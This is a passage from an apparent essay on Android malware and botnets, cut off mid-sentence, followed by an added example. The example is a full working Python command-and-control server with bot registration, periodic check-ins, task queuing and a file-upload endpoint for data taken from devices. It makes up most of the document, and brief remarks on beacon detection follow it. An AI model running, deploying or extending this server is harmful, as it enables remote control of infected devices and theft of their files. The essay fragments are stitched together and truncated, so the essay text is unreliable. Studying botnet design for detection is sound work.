Android Malware And Botnet Analysis

Android Malware and Botnets
Malware in various forms has been present since computers were first invented. One of the most interesting kinds is malware that takes control of a computer and reports back to the malicious actor who infected it. The malware allows the attacker to use the infected computer remotely, effectively turning it into a bot. Normally these bots are part of a network of infected computers known as a botnet. The attacker in control of a botnet can use it for a variety of purposes. One of the most common is the distributed denial-of-service (DDoS) attack, where the bots send massive amounts of web traffic to a single website in an attempt to bring it down. Botnets can also be used to
…
Specifically, I used the JetBrains PyCharm IDE for development (PyCharm: Download Latest, 2016). I chose it for its code error checking and debugging capabilities. As already explained, the command and control server was initially going to use raw sockets to communicate with clients. This did not pan out. Instead, I used the "http.server" library in Python (http.server – HTTP servers, 2016). The class that handles HTTP requests was only a few lines of code and could easily be expanded to fit my needs. I focused mainly on the "do_POST" method, since all client requests were made via HTTP POST. In addition to handling communications, the command and control server also needed to keep track of clients and take command input from the user running the server. To handle commands, I created a simple while loop that prompts for input until the "exit" command is given, backed by a list of valid commands to check against. To keep track of clients I used a dictionary of key–value pairs (Data Structures, 2016). The key had to be unique to each individual device, and UUIDs fit the bill, so each device is identified by a UUID (Leach, Mealling, & Salz, 2005). The dictionary value had to hold per-client data, so I created a class that stores a variety of information about the client. The next step was to create the handlers for each command. I created a "connect" URL that clients visit the first time they join the botnet, a "checkin" URL that they check in to every 30 seconds, and a "fileupload" URL where a client sends a file and its metadata to the server. After settling the communication methods, I determined a set of simple commands that could be run; these are listed in the results section. The next step was to implement timers to see when each client last checked in. On the
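The design described above (an `http.server` handler that routes POSTs to connect, check-in and file-upload endpoints, a dictionary of UUID-keyed client records, a last-seen timer and an operator prompt with a list of valid commands) fits in well under a hundred lines. The following is an added example written for this page, not the essay's own code; the endpoint names and the 30-second check-in period come from the text, while the JSON message format, the hex encoding of uploaded files, the 90-second stale threshold, the command and task names and all class and function names are assumptions made for the example.

```python
"""Minimal HTTP command-and-control server in the shape the essay describes.
Added example; endpoint names and the 30 s check-in follow the text, everything
else (JSON bodies, hex-encoded uploads, stale threshold, names) is assumed."""
import json
import time
import uuid
from dataclasses import dataclass, field
from http.server import BaseHTTPRequestHandler, HTTPServer
from typing import Dict, List

CHECKIN_INTERVAL = 30                # seconds; the essay's check-in period
STALE_AFTER = 3 * CHECKIN_INTERVAL   # assumption: three missed check-ins = stale
VALID_COMMANDS = {"list", "task", "stale", "exit"}  # assumption: operator prompt commands
BOT_TASKS = {"sysinfo", "getfile"}                  # assumption: tasks a bot may be handed


@dataclass
class Client:
    """Dictionary value for one bot; the dictionary key is its UUID."""
    uuid: str
    device: str
    first_seen: float
    last_seen: float
    pending: List[str] = field(default_factory=list)      # tasks handed out at next check-in
    files: Dict[str, bytes] = field(default_factory=dict)  # uploaded name -> contents


class BotnetState:
    """Client registry and command logic, kept apart from HTTP so it can be tested directly."""

    def __init__(self) -> None:
        self.clients: Dict[str, Client] = {}

    def connect(self, device: str, now: float) -> str:
        """First contact: mint a version-4 UUID for the device and register it."""
        cid = str(uuid.uuid4())
        self.clients[cid] = Client(cid, device, now, now)
        return cid

    def checkin(self, cid: str, now: float) -> List[str]:
        """Periodic beacon: refresh last_seen and hand back any queued tasks."""
        client = self.clients[cid]  # KeyError for an unknown UUID
        client.last_seen = now
        tasks, client.pending = client.pending, []
        return tasks

    def fileupload(self, cid: str, name: str, data: bytes, now: float) -> int:
        """Store an uploaded file under its metadata name; also counts as a check-in."""
        client = self.clients[cid]
        client.last_seen = now
        client.files[name] = data
        return len(data)

    def queue_task(self, cid: str, task: str) -> bool:
        """Operator queues a task for one bot; unknown tasks or UUIDs are refused."""
        if task not in BOT_TASKS or cid not in self.clients:
            return False
        self.clients[cid].pending.append(task)
        return True

    def stale_clients(self, now: float) -> List[str]:
        """UUIDs whose last check-in is older than STALE_AFTER seconds."""
        return [c.uuid for c in self.clients.values() if now - c.last_seen > STALE_AFTER]


def make_handler(state: BotnetState):
    """Bind a BaseHTTPRequestHandler subclass to one BotnetState instance."""

    class C2Handler(BaseHTTPRequestHandler):
        def do_POST(self) -> None:  # all bot traffic is POST, routed on the path
            length = int(self.headers.get("Content-Length", "0"))
            body = json.loads(self.rfile.read(length) or b"{}")
            now = time.time()
            try:
                if self.path == "/connect":
                    reply = {"uuid": state.connect(body.get("device", "unknown"), now)}
                elif self.path == "/checkin":
                    reply = {"tasks": state.checkin(body["uuid"], now)}
                elif self.path == "/fileupload":
                    data = bytes.fromhex(body["hex"])  # assumed encoding of the file body
                    reply = {"stored": state.fileupload(body["uuid"], body["name"], data, now)}
                else:
                    self.send_error(404)
                    return
            except (KeyError, ValueError):  # unknown UUID or malformed body
                self.send_error(400)
                return
            out = json.dumps(reply).encode()
            self.send_response(200)
            self.send_header("Content-Type", "application/json")
            self.send_header("Content-Length", str(len(out)))
            self.end_headers()
            self.wfile.write(out)

    return C2Handler


def run_command(state: BotnetState, line: str) -> str:
    """One operator command, checked against VALID_COMMANDS as in the essay's while loop."""
    parts = line.split()
    if not parts or parts[0] not in VALID_COMMANDS:
        return "unknown command; valid: " + ", ".join(sorted(VALID_COMMANDS))
    now = time.time()
    if parts[0] == "list":
        return "\n".join(f"{c.uuid} {c.device} last seen {now - c.last_seen:.0f}s ago"
                         for c in state.clients.values()) or "(no clients)"
    if parts[0] == "stale":
        return "\n".join(state.stale_clients(now)) or "(none)"
    if parts[0] == "task":  # usage: task <uuid> <taskname>
        return "queued" if len(parts) == 3 and state.queue_task(parts[1], parts[2]) else "refused"
    return "exit"


if __name__ == "__main__":
    import threading
    state = BotnetState()
    server = HTTPServer(("127.0.0.1", 8080), make_handler(state))  # loopback only for a lab
    threading.Thread(target=server.serve_forever, daemon=True).start()
    while (result := run_command(state, input("c2> "))) != "exit":
        print(result)
    server.shutdown()
```

Two points worth noting for anyone building or hunting this kind of thing. First, the essay's 30-second check-in is a fixed-interval POST beacon to a small set of paths from every bot, which is exactly the periodicity and path reuse that network detection keys on; the stale-client timer is also why the server must record `last_seen` on every endpoint a bot touches, not only on `/checkin`. Second, keeping the registry and command logic in `BotnetState` rather than inside `do_POST` is what makes the check-in and timer behaviour testable without standing up a socket.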
